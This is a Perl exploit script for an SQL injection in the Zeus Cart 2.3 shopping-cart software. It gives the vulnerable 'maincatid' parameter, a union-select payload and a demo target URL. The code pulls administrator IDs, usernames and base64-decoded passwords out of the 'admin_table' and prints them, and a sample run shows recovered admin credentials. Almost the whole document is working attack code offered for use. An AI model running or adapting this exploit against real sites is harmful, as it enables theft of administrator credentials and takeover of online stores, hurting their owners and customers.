#!usr/bin/perl #|------------------------------------------------------------------------------------------------------------------ #| -Info: # #| -Name: Zeus Cart V 2.3 #| -Site: http://www.zeuscart.com/ #| -Site Demo: http://www.zeuscart.com/onlinedemo.php?action=skip #| -Bug: Sql Injection #| -Found: by Br0ly #| -BRAZIL >D #| -Contact: br0ly[dot]Code[at]gmail[dot]com #| #| -Gretz: Osirys , xs86 , str0ke #| #| -p0c: #| -SQL INJECTION: #| #| -9999+union+all+select+0-- #| #| - Demo ONline: #| #| -> http://ajdemos.com/demo/zeuscart/v23/?do=featured&action=showmaincatlanding&maincatid=[SQL] #| #| #| -Exploit: Demo: #| #|perl zeuscart.txt http://ajdemos.com/demo/zeuscart/v23/ #| #| -------------------------------------- #| -Zeus Cart V2.3 #| -Sql Injection #| -by Br0ly #| -------------------------------------- #| #|[+] Getting the login,pass #| #|[+] User = demoadmin #|[+] Pass = demo123 #| #| #| ;D #|
use IO::Socket::INET; use LWP::UserAgent; use MIME::Base64; my $host = $ARGV[0]; my $sql_path = "/?do=featured&action=showmaincatlanding&maincatid="; if (@ARGV < 1) { &banner(); &help("-1"); }
elsif(cheek($host) == 1) { &banner(); &xploit($host,$sql_path); } else { &banner(); help("-2"); } sub xploit() {
my $host = $_[0]; my $sql_path = $_[1];
print "[+] Getting the login,pass\n\n";
my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--"; my $sql_get = get_url($sql_atk); my $connect = tag($sql_get); if($connect =~ /br0ly:(.+):(.+):(.+):br0ly/) { my $id = $1; my $user = $2; my $pass = $3;
if($id =~ /(.+):/) { my $id_2 = $1; } my $pass_aux = base64_decode($pass);
print "[+] User = $user\n"; print "[+] Pass = $pass_aux\n"; exit(0); } else { print "[-] Exploit, Fail\n"; exit(0); } }
sub get_url() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; }
sub tag() { my $string = $_[0]; $string =~ s/ /\$/g; $string =~ s/\s/\*/g; return($string); }
sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } }
sub base64_decode () { my $str_1 = $_[0]; my $str_decode = decode_base64($str_1); return $str_decode; }
sub help() {
my $error = $_[0]; if ($error == -1) { print "\n[-] Error, missed some arguments !\n\n"; } elsif ($error == -2) {
print "\n[-] Error, Bad arguments !\n"; } print "[*] Usage : perl $0 http://localhost/zeuscart/\n\n"; print " Ex: perl $0 http://localhost/zeuscart/\n\n"; exit(0); }
sub banner { print "\n". " --------------------------------------\n". " -Zeus Cart V2.3 \n". " -Sql Injection \n". " -by Br0ly \n". " --------------------------------------\n\n"; }
|